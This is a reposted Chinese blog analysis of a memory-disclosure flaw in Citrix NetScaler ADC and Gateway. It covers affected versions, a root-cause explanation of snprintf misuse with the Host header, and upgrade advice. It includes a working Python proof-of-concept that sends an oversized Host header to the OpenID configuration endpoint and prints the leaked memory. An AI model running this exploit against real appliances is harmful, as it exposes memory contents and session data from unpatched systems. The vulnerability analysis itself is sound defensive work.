1.漏洞描述
Citrix Systems Citrix NetScaler Gateway(Citrix Systems Gateway)和Citrix Systems NetScaler ADC都是美国思杰系统(Citrix Systems)公司的产品。
NetScaler ADC和NetScaler Gateway存在安全漏洞,该漏洞源于存在敏感信息泄露。
2.影响版本
- NetScaler ADC and NetScaler Gateway 14.1 < 14.1-8.50
- NetScaler ADC and NetScaler Gateway 13.1 < 13.1-49.15
- NetScaler ADC and NetScaler Gateway 13.0 < 13.0-92.19
- NetScaler ADC 13.1-FIPS < 13.1-37.164
- NetScaler ADC 12.1-FIPS < 12.1-55.300
- NetScaler ADC 12.1-NDcPP < 12.1-55.300
3.影响范围
4.漏洞分析
这里以 13.0-47 的固件为例子, 从固件拉出 nsppe 这个程序,用 IDA 打开分析。 搜索文章提到的字符串可以看到如下代码:
snprintf函数被用于将hostname参数拼接到print_temp_rule变量中,并根据返回的长度,通过ns_vpn_send_response函数返回HTTP请求的结果。这种对snprintf的使用方法是一个常见的错误。这里的hostname参数是由 HTTP 请求中的 Host 头决定的,因此这个参数的长度我们是完全可以控制的。
snprintf 这个函数应该返回的是 ”想要写入buffer 的字符串长度“ , 而不是实际写入buffer的字符长长度。可以从一个 DEMO 看出这个效果:
可以看到,当我想写入 16长度的字符串的时候, n2的值为 16, 而不是实际写入的长度。
另外到达这个函数的路由,通过对这个函数 ns_aaa_oauth_send_openid_config
进行交叉引用一下子就看到了:
Poc:
#!/usr/bin/env python3
import sys
import requests
import urllib3
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
parser = argparse.ArgumentParser()
parser.add_argument('--target', help='The Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)')
args = parser.parse_args()
if args.target is None:
print('Target must be provided (e.g. --target 192.168.1.200)')
sys.exit(0)
hostname = args.target
if __name__ == "__main__":
headers = {
"Host": "a"*24576
}
r = requests.get(f"https://{hostname}/oauth/idp/.well-known/openid-configuration", headers=headers, verify=False,timeout=10)
if r.status_code == 200:
print("--- Dumped Memory ---")
print(r.text[131050:])
print("--- End ---")
else:
print("Could not dump memory")
**5.**修复建议
- 官方升级
目前官方已发布安全版本修复此漏洞,建议受影响的用户及时升级防护:
标签:
安全
本文转载自: https://blog.csdn.net/xuandao_ahfengren/article/details/141123301
版权归原作者 玄道网安 所有, 如有侵权,请联系我们删除。
版权归原作者 玄道网安 所有, 如有侵权,请联系我们删除。